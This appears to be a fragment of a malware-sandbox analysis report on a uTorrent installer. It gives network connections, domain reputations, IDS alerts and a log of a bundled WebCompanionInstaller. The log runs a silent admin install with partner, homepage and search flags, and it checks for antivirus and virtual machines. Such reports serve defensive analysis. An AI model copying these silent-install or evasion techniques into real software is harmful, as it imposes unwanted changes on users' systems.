3632 | utorrent.45231.installer.exe | 54.243.113.215:80 | i-50.b-000.xyz.bench.utorrent.com | Amazon.com, Inc. | US | suspicious |
2552 | utorrent.45231.installer.exe | 98.143.146.7:80 | utorrent.com | QuadraNet, Inc | US | suspicious |
2524 | cscript.exe | 54.235.208.27:80 | i-50.b-000.xyz.bench.utorrent.com | Amazon.com, Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
router.bittorrent.com | | shared |
router.utorrent.com | | whitelisted |
i-50.b-000.xyz.bench.utorrent.com | | whitelisted |
download-lb.utorrent.com | | whitelisted |
ip-api.com | | shared |
utorrent.com | | whitelisted |
webcompanion.com | | malicious |
i-21.b-45231.ut.bench.utorrent.com | | suspicious |
apps.bittorrent.com | | whitelisted |
update.bittorrent.com | | whitelisted |
PID | Process | Class | Message |
---|---|---|---|
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] uTorrent Hydra Client POST JSON |
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] P2P uTorrent Hydra Client |
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] uTorrent Hydra Client POST JSON |
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] P2P uTorrent Hydra Client |
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] uTorrent Hydra Client POST JSON |
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] P2P uTorrent Hydra Client |
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] uTorrent Hydra Client response_code |
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] uTorrent Hydra Client response_code |
2552 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] P2P uTorrent Hydra Client |
2552 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] uTorrent Hydra Client POST JSON |
Process | Message |
---|---|
WebCompanionInstaller.exe | Detecting windows culture |
WebCompanionInstaller.exe | 5/24/2019 3:24:08 PM :-> Starting installer 4.7.1987.3881 with: .\WebCompanionInstaller.exe --partner=BT170902 --version=4.7.1987.3881 --prod --silent --partner=BT170902 --homepage=1 --search=1, Run as admin: True |
WebCompanionInstaller.exe | Preparing for installing Web Companion |
WebCompanionInstaller.exe | 5/24/2019 3:24:09 PM :-> Generating Machine and Install Id ... |
WebCompanionInstaller.exe | 5/24/2019 3:24:09 PM :-> Machine Id and Install Id has been generated |
WebCompanionInstaller.exe | 5/24/2019 3:24:09 PM :-> Checking prerequisites ... |
WebCompanionInstaller.exe | 5/24/2019 3:24:09 PM :-> Antivirus not detected |
WebCompanionInstaller.exe | 5/24/2019 3:24:09 PM :-> vm_check False |
WebCompanionInstaller.exe | 5/24/2019 3:24:10 PM :-> reg_check :False |
WebCompanionInstaller.exe | 5/24/2019 3:24:11 PM :-> Installed .Net framework is V40 |